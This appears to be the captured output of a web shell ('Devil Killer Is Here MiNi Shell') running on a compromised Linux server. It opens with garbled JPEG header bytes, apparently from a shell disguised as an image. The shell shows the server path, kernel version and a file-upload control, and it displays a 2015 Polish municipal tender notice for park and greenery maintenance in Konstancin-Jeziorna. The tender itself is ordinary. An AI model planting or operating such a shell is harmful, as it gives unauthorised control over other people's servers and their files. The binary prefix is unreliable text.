JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150806/200788-N-2015.html

<p class="kh_header"><b>Konstancin-Jeziorna: Pielęgnacja i urządzanie terenów zieleni
w Konstancinie-Jeziornie</b><br>
<b>Numer ogłoszenia: 200788 - 2015; data zamieszczenia: 06.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Konstancin-Jeziorna, Urząd Miasta i Gminy Konstancin-Jeziorna , ul. Warszawska 32, 05-520 Konstancin-Jeziorna, woj. mazowieckie, tel. +48 22 7564810, +48 22 2011975, faks +48 22 7564885, +48 222011975.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.konstancinjeziorna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pielęgnacja i urządzanie terenów zieleni
w Konstancinie-Jeziornie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług polegających na pielęgnacji zieleni na terenach obiektów urządzonych tj.: w parkach, skwerach i na osiedlach oraz innych pracach ogrodniczych w zakresie utrzymania i kształtowania zieleni miejskiej w granicach Gminy Konstancin-Jeziorna w 2015 roku.

A. Pielęgnacja zieleni na terenach obiektów urządzonych (tj. terenów zinwentartyzowanych, gdzie znane są ich parametry- krzewów, trawników, itd. w granicach określonego obszaru)
Wykaz obiektów:
1.	Park osiedlowy w Mirkowie, 
2.	Teren zieleni nad stawem w Mirkowie,
3.	Skwer przy oczku wodnym, 
4.	Zieleńce przyuliczne zabudowy jednorodzinnej w rejonie ul. Świetlicowej/Polnej/ Warszawskiej,
5.	Zieleńce przyuliczne Klarysewa Wschodniego
6.	Osiedle Porąbka, 
7.	Osiedle w Mirkowie, 
8.	Osiedle Grapa,

Zakres obejmuje wykonywanie niezbędnych prac ogrodniczych, zleconych w danym okresie rozliczeniowym, m. in. cięcia krzewów, strzyżenie żywopłotów i odchwaszczanie wraz z uporządkowaniem najbliższego otoczenia po zakończonych pracach, ma zapewnić osiągnięcie właściwego efektu estetycznego na poszczególnych obiektach. 

Zakres prac, z podziałem na obiekty, przedstawia formularz cenowy stanowiący załącznik nr 1.1 do SIWZ. 




B. Obsadzenia donic i rabat kwiatowych oraz inne prace ogrodnicze w zakresie utrzymania i kształtowania zieleni miejskiej

Usługa realizowana według bieżących potrzeb, na podstawie sukcesywnie przeprowadzanych oględzin w terenie, przedstawiciela Zamawiającego z udziałem Wykonawcy. Zakres prac, lokalizacja i termin realizacji poszczególnych czynności, będzie każdorazowo określany w protokole wprowadzenia. Rozliczenie prac nastąpi na podstawie protokołu odbioru robót, stwierdzającego wykonanie poszczególnych czynności w odniesieniu do ilości i jakości w okresach miesięcznych.
Wyszczególnienie i opis prac:


Lp.	
Wyszczególnienie prac		
Uwagi/ zalecenia/ opis zakresu czynności
DONICE/ KWIETNIKI
1	Transport i  ustawienie donic i konstrukcji kwiatowych (betonowych, metalowych, metalowo-drewnianych, wież kwiatowych, kwietników wiszących) oraz transport posezonowy na bazę		Transport donic i innych kwietników istniejących - do magazynu oddalonego ok. 3km;  ustawienie w miejsce wskazane przez Zamawiającego lub zmiana lokalizacji donic. Ciężar obsadzonych kwietników: wieże do 600kg, inne kwietniki do 150kg.
2	mycie donic istniejących z uprzątnięciem otoczenia 		Należy zastosować odpowiednie i skuteczne środki czyszczące do zmycia zabrudzeń występujących na donicach betonowych, drewnianych (wolnostojących, przyulicznych). Zakres prac obejmuje również usunięcie zanieczyszczeń i piasku zalegającego wokół kwietników. 
3	jesienne obsadzenie donic kwiatowych z kosztem materiału roślinnego 		Ukwiecenie sadzonkami w ilości stosownej do wielkości kwietnika, w tym: wymiana lub wypełnienie ziemią kompostową/ kwiatową z zastosowaniem  hydrożelu, posadzenie roślin, podlanie. Przewiduje się ustawienie donic wzdłuż ulic i na placach.
Preferowane gatunki roślin jednorocznych do obsady kwietników:, starce, złocienie, brassica w obsadzie jesiennej. Materiał roślinny - dobrze rozkrzewiony, wolny od chorób i szkodników. Ilość roślin - stosowna względem wielkości i rodzaju materiału roślinnego -bez pozostawiania wolnych przestrzeni w donicy. Dobór materiału roślinnego oraz kompozycje roślinne będą się odbywały pod bezpośrednim nadzorem Zamawiającego. 
4	miesięczna pielęgnacja donic, kwietników i wież kwiatowych (z kosztem wody) 		Zakres miesięcznej pielęgnacji obejmuje w szczególności: bieżące usuwanie przekwitłych kwiatostanów, wymiana obumarłych roślin (dot. materiału sadzonego przez Wykonawcę),  nawożenie, odchwaszczanie - z wywozem powstałego urobku, podlewanie z kosztem wody (- możliwość poboru wody z terenu miasta za opłatą). Pielęgnacja obejmuje również oczyszczenie i przygotowanie donic do zimy tj. usunięcie przekwitłych roślin, wyrównanie powierzchni ziemi, okrycie donic np. gałązkami roślin iglastych, uprzątnięcie otoczenia donic.
RABATY KWIATOWE
5	przygotowanie terenu pod rabatę kwiatową lub nasadzenia krzewów z kosztem wymiany ziemi (z ewentualnym zastosowaniem hydrożelu)		Zakres prac obejmuje: w miejscu wskazanym przez Zamawiającego - przekopanie terenu w granicach wyznaczonej rabaty z wymianą wierzchniej warstwy gleby (ok 10-15 cm), usunięciem ewentualnych nieczystości organicznych i kamieni i uzupełnienie ziemią kompostową oraz w uzgodnieniu z Zamawiającym- zastosowanie hydrożelu. Dotyczy istniejących i planowanych miejsc.
6	obsadzenie rabat kwiatowych z kosztem materiału roślinnego  (w założeniu: 2-3 zmiany kwiatowe, w tym nasadzenia tulipanów i bratków w okresie jesienno-zimowym)		Zakres:  przekopanie terenu pod rabatę z usunięciem resztek organicznych, zastosowanie hydrożelu, posadzenie roślin, podlanie 
Przewidziana lokalizacja: ronda, skwery, zieleńce przyuliczne.
Preferowane gatunki roślin jednorocznych do obsady rabat to: aksamitki, kocanki, pelargonie, lobelie, starce, złocienie, (tulipany, bratki). Materiał roślinny powinien być dobrze rozkrzewiony, wolny od chorób i szkodników. Ilość roślin - stosowna (względem wielkości i rodzaju materiału roślinnego) dla osiągnięcia zwartej skupiny na rabacie. Dobór materiału roślinnego oraz kompozycje roślinne będą się odbywały pod bezpośrednim nadzorem Zamawiającego. 
7	miesięczna pielęgnacja rabat kwiatowych		Zakres miesięcznej pielęgnacji obejmuje w szczególności: bieżące usuwanie przekwitłych kwiatostanów, wymiana obumarłych roślin,  nawożenie, odchwaszczanie - z wywozem powstałego urobku, podlewanie (z kosztem wody - możliwość poboru wody z terenu Konstancina za opłatą) 
INNE PRACE OGRODNICZE NA TERENIE MIASTA I GMINY
9	cięcia formujące krzewów w skupinach do wys. <1m,		Prace obejmują ukształtowanie krzewu lub skupiny krzewów oraz w razie konieczności usunięcie pędów obumarłych; 

10	cięcia formujące krzewów  (w większości w skupinach) o wys. >1m		
11	mulczowanie powierzchni korą o grub. 5 cm 		materiał średniomielony, kompostowany
12	pielenie powierzchni krzewów , krzewinek i roślin okrywowych 		dotyczy zieleni w obszarze gminy, zieleni przyulicznej, nie dotyczy obiektów urządzonych, o których mowa w części A. 
13	strzyżenie żywopłotów (obcięcie brzegów krzewów żywopłotowych, o szerokości 60 -  80cm) wraz z grabieniem i wywozem urobku		Należy uwzględnić usuwanie młodych siewek drzew
	sadzenie krzewów dużych, >0,5m wys. (z kosztem materiału roślinnego) 
- w ilości 1-3 szt./m2		


Zakres: dowiezienie uzgodnionego z Zamawiającym i zakupionego przez Wykonawcę materiału roślinnego ze szkółki, wykopanie dołu, odspojenie i wywiezienie urobku, zaprawienie dołu ziemią kompostową, posadzenie, podlanie oraz zapewnienie pielęgnacji w okresie trwania umowy (pielenie, podlewanie, cięcia).  Dot. nasadzeń  na terenie gminy, wykonywanych według bieżących założeń i potrzeb.
	sadzenie krzewów małych, <0,5m wys. (z kosztem materiału roślinnego),  
- w ilości 3-6 szt./m2		
	sadzenie żywopłotów  (z kosztem materiału roślinnego), 
Krzewy żywopłotowe sadzone w dwóch rzędach w trójkąt, ok. 6-8szt./mb		
14	renowacja trawnika (bez wymiany ziemi)		Zakres prac obejmuje: przycięcie przerośniętej trawy i chwastów lub przekopanie gruntu rodzimego (w przypadku  przedeptów) na głębokość ok. 10cm z usunięciem ewentualnego gruzu lub innych odpadów, wygrabienie i wyrównanie powierzchni, wysiew  i przykrycie cienką ok. 2cm warstwą ziemi kompostowej ( do podłoży ogrodniczych, trawników) wysianie mieszanki traw, wałowanie i podlanie wraz z wywozem powstałego urobku. Renowacja obejmuje w większości fragmenty zieleni przyulicznej.
15	
założenie trawnika z wymianą ziemi 		Zakres prac obejmuje: odspojenie i wywiezienie warstwy 10cm gruntu, przekopanie gruntu rodzimego z usunięciem ewentualnego gruzu lub innych odpadów, wyrównanie terenu (z jednoczesnym usunięciem wzniesień i zagłębień terenu - teren należy wyrównać do poziomu drogi lub krawężnika), dowiezienie z rozplanowaniem ziemi (mieszanki ziemi do podłoży ogrodniczych, trawników), wysiew  i przykrycie cienką warstwą ziemi mieszanki traw, wałowanie i podlanie wraz z wywozem powstałego urobku.
16	wykonanie obrzeża żwirowego wokół rabat lub wypełnienie żwirem powierzchni zieleńca		Wykonanie obrzeży lub powierzchni żwirowych w miejscach wskazanych przez Zamawiającego. Profil konstrukcyjny winien uwzględniać: (usunięcie ok. 20 cm warstwy ziemi na szer. 50 cm) podsypka piaskowa - 5 cm, tkanina izolacyjna lub geowłóknina lub folia (przepuszczalna), żwir gruby barwy jasnej/białej (40-70 mm) z ewent. domieszką żwiru średniego (do 30%/m2). Należy zastosować trwałe i stabilne obrzeże oddzielające nawierzchnie (żwirową i ziemną) np. typu eko-bord z kotwami mocującymi lub z desek impregnowanych ciśnieniowo mocowanych kołkami co ok. 50 cm.


Wykaz donic przewidzianych w zamówieniu do pielęgnacji:

Typ donicy/ kwietnika	Przewidziana ilość	Parametry zewnętrzne
[cm]	Szacunkowa ilość kwiatów 1 donica [szt]
sześciokątne (betonowe, bez wkładów) 1szt	1szt	śr 80	Powierzchnia: 0,50m2  1 donica; Kwiaty małe: 20-25 szt.; kwiaty duże: 8-15 szt
podłużne prostokątne (betonowe, bez wkładów),	23szt	100x40	Powierzchnia: 0,40m2 1 donica; Kw. małe: 20-23 szt; kw. duże: 8-15 szt
owalne (betonowe, bez wkładów)	5szt	120x40	Powierzchnia: 0,48m2 1 donica; Kw. małe: 20-23 szt; kw. duże: 8-15 szt
Okrągłe metalowo-drewniane (model PARK) 	40szt	śr 60	Powierzchnia: 0,28m2 1 donica; Kw. małe 8-10 szt. , kw. duże 5-7 szt.
Kwietniki wiszące (dwie połowy misy polietylowej, mocowane na słupach oświetleniowych w pasie drogi; podwójne ścianki misy - zbiornik na wodę 5l) 	50szt	Śr 65	Rośliny zwisające, duże egzemplarze 8-10 szt. (połowa kwietnika: 4-5 szt)
(Szczegóły dot. kwietników - patrz www.sial.pl)

Klasyczne gigant doniczki z tworzywa polipropylenu , model EXTRAVASE POT	13szt	Sr 12 szt=100cm, 1szt.=120cm	Do uzgodnienia gatunki i ilości.
(Szczegóły dot. kwietników - patrz www.sial.pl)

Dwupoziomowy kwietnik wiszący SIFU	3kpl	Ś 460/580cm	Szacunkowa powierzchnia 0,6m2- dwie donice; ilość roślin: 15-20szt., preferowane  rośliny zwisające,
Wieże kwiatowe 	39szt	Wieża: wys. śr. podstawy śr. szczytowej misy (ilość pierścieni):
H700= 700 x 750 x 750 (3)
H750= 750 x 1200 x 800 (3)
H1100= 1010 x 600 x 350 (6)
H1200= 1350 x 1200 x 700 (6)
(szczegóły dotyczące parametrów patrz www.terra-pl.eu)	Obsadzenia: w zależności od rodzaju i wielkości materiału  roślinnego:
H700      32-70 szt sadzonek
H750      35-45 szt sadzonek
H1100   40-60 szt sadzonek
H1200   80-120 szt sadzonek


II. Inne informacje dotyczące przedmiotu zamówienia.
1)	Zamówienie realizowane będzie według bieżących potrzeb oraz założeń pielęgnacyjnych, na podstawie protokołów wprowadzenia, określających szczegółowy zakres prac, lokalizację oraz termin realizacji.
2)	Częstotliwość wykonania prac pielęgnacyjnych i porządkowych ma zapewnić stały estetyczny wygląd miasta i będzie dostosowana do warunków atmosferycznych w danych porach roku.
3)	W oparciu o przyjęte w zamówieniu założenia dotyczące ilości i częstotliwości prac Wykonawca zobowiązany jest na początku każdego miesiąca uzgodnić, z inspektorem nadzorującym prace, szczegóły dotyczące m.in. zakresu przewidzianych robót i lokalizację.
4)	Wykonawca jest zobowiązany powiadomić inspektora nadzorującego prace o ewentualnych problemach w trakcie ich realizacji.
5)	Rozliczenie za wykonanie prac, określonych w poszczególnych zadaniach następować będzie w okresach miesięcznych, według jednostkowych stawek cenowych, na podstawie kosztorysu powykonawczego stwierdzającego rzeczywiste wykonanie prac, w odniesieniu do ilości.
6)	Podstawą do wystawienia faktury i dokonania płatności za wykonane prace będzie protokół odbioru robót wraz z kosztorysem powykonawczym, sporządzonym przez Wykonawcę i zaakceptowanym przez Zamawiającego.
7)	Realizacja prac powinna być zorganizowana i wykonywana w sposób gwarantujący pełną ochronę drzewostanu rosnącego w obszarze działania Wykonawcy .
8)	Wykonawca zobowiązany jest zapoznać się ze specyfiką terenu i warunkami lokalnymi, w których będzie realizowany przedmiot zamówienia.
9)	Zamawiający żąda od Wykonawcy odpowiedniego przygotowania kadrowego i technicznego, które pozwoli na terminowe i efektywne wykonanie prac tj. prowadzenia prac w tym samym czasie na różnych terenach objętych zamówieniem a w szczególności na terenach osiedli (w Mirkowie i na Grapie).
10)	Do obowiązków Wykonawcy będzie należało m.in. przygotowanie (ewentualne zabezpieczenie) terenu do realizacji prac (np. w miarę potrzeb - rozmieszczenie informacji o planowanych robotach), usunięcie przeszkód utrudniających wykonanie prac (np. parkujące samochody).
11)	W ramach świadczenia usług, w przypadku konieczności poruszania się po drogach powiatowych i gminnych objętych ograniczeniem dopuszczalnej masy całkowitej pojazdami przekraczającymi to ograniczenie (do 2,5 t), niezbędne będzie uzyskanie zgody Starostwa Powiatowego w Piasecznie przez Wykonawcę. 
12)	Na terenie osiedli, skwerach pracownicy wykonujący prace, będą mogli poruszać się pojazdami o DMC przekraczającej 2,5 t wyłącznie po głównych ciągach, jednakże masa całkowita pojazdu nie może przekroczyć 12 t. Poruszanie się po nawierzchniach nieutwardzonych (trawiastych) jest możliwe wyłącznie mniejszymi pojazdami o masie całkowitej nieprzekraczającej 2,5 t.
13)	W celu zapewnienia ochrony obiektów zieleni oraz bezpieczeństwa ich użytkownikom, ruch pojazdów mechanicznych po terenie winien być ograniczony do niezbędnego minimum.
14)	Bezwzględnie zabrania się poruszania pojazdami, których wielkość (lub ciężar) w jakikolwiek sposób może spowodować uszkodzenie drzewostanu, w tym ich systemu korzeniowego oraz ciągów pieszych.
15)	Wszystkie prace, a w szczególności koszenie zieleni przyulicznej i poboczy dróg należy wykonywać w sposób ograniczający uciążliwość w ruchu pojazdów (tj. poza godzinami szczytu).
16)	Wykonawca zobowiązany jest do bieżącego usuwania powstałego urobku podczas realizacji robót zgodnie z zasadami gospodarowania odpadami, wymogami ochrony środowiska i przepisami powszechnie obowiązującymi w tym zakresie, nie później niż dnia następnego, po uzgodnieniu z Zamawiającym.
17)	Zamawiający zastrzega sobie możliwość przesunięcia terminów realizacji poszczególnych prac określonych w zadaniach, podyktowanych bieżącymi potrzebami pielęgnacyjnymi czy nieprzewidywalnymi warunkami atmosferycznymi (np. długotrwała susza), w tym wypadku Zamawiający powiadomi Wykonawcę o zaistniałej zmianie, ustalając kolejny termin realizacji.
18)	Zamawiający zastrzega sobie prawo do zmiany obsługiwanej powierzchni terenu jak również ilości, częstotliwości lub krotności prac, w tym zmniejszenia o 40% ogólnej wartości przedmiotu zamówienia, podyktowanych nieprzewidzianymi okolicznościami oraz bieżącymi potrzebami (np. realizacja robót drogowych, budowlanych uniemożliwiająca realizację określonych w zamówieniu prac).
19)	Częstotliwość i ilość poszczególnych prac, określono przy założeniu świadczenia usług w okresie IX - XI br.
20)	Zamawiający nie przewiduje udzielenia zaliczki na poczet wykonania zamówienia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający zastrzega sobie możliwość udzielenia zamówienia uzupełniającego, o którym mowa w art. 67 ust. 1 pkt 6 ustawy Pzp.

Przedmiotem zamówień uzupełniających jest zakres prac wyszczególnionych w SIWZ.

Zakres zamówień uzupełniających będzie wynosić do 50 % wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do przetargu, Wykonawca jest obowiązany wnieść wadium w wysokości 5.000,00 zł.

1.	Wadium może być wnoszone w:
1)	pieniądzu,
2)	poręczeniu bankowym lub poręczeniu spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
2.	Wadium należy wnieść do dnia składania ofert.
3.	Wadium wniesione w pieniądzu należy wpłacić na konto 15 8002 0004 0200 1111 2002 0067 (liczy się data wpływu na podane konto).
4.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
5.	W przypadku wnoszenia wadium w innej formie niż pieniądz oryginał należy złożyć w Wydziale Finansowym Urzędu Miasta i Gminy Konstancin-Jeziorna, ul. Warszawska 31, 05-520 Konstancin-Jeziorna, I piętro, pok. nr 6 - do upływu terminu składania ofert, natomiast kopię należy zamieścić w ofercie.
6.	Jeżeli zabezpieczenie wniesiono w formie gwarancji bankowych lub ubezpieczeniowych, gwarancja musi zawierać deklarację o nieodwołalnej i bezwarunkowej zapłacie na pierwsze pisemne wezwanie Zamawiającego kwoty zabezpieczenia.

Zwrot wadium
1.	Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 7.
2.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
3.	Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4.	Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zawrócono wadium na podstawie ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
5.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
6.	Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz Zamawiającego, w przypadku gdy:
1)	odmówi podpisania umowy na warunkach określonych w ofercie,
2)	nie wniósł zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
7.	Na mocy art. 46 ust. 4a ustawy Pzp zostanie zatrzymane wadium Wykonawcy,  jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
8.	W ofercie należy podać numer konta (w przypadku wadium wniesionego w pieniądzu) lub adres (w pozostałych przypadkach), na jakie Zamawiający dokona zwrotu wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy złożą oświadczenie o spełnieniu warunków udziału w postępowaniu określonych przepisami art. 22 ust. 1 ustawy Pzp (załącznik nr 3). Zamawiający odstępuje od opisania sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy złożą oświadczenie o spełnieniu warunków udziału w postępowaniu określonych przepisami art. 22 ust. 1 ustawy Pzp (załącznik nr 3). Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, minimum dwie usługi polegające na utrzymaniu i urządzaniu zieleni miejskiej - osiedla, parki, zieleń przyuliczna o wartości minimum 200.000,00 zł brutto każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
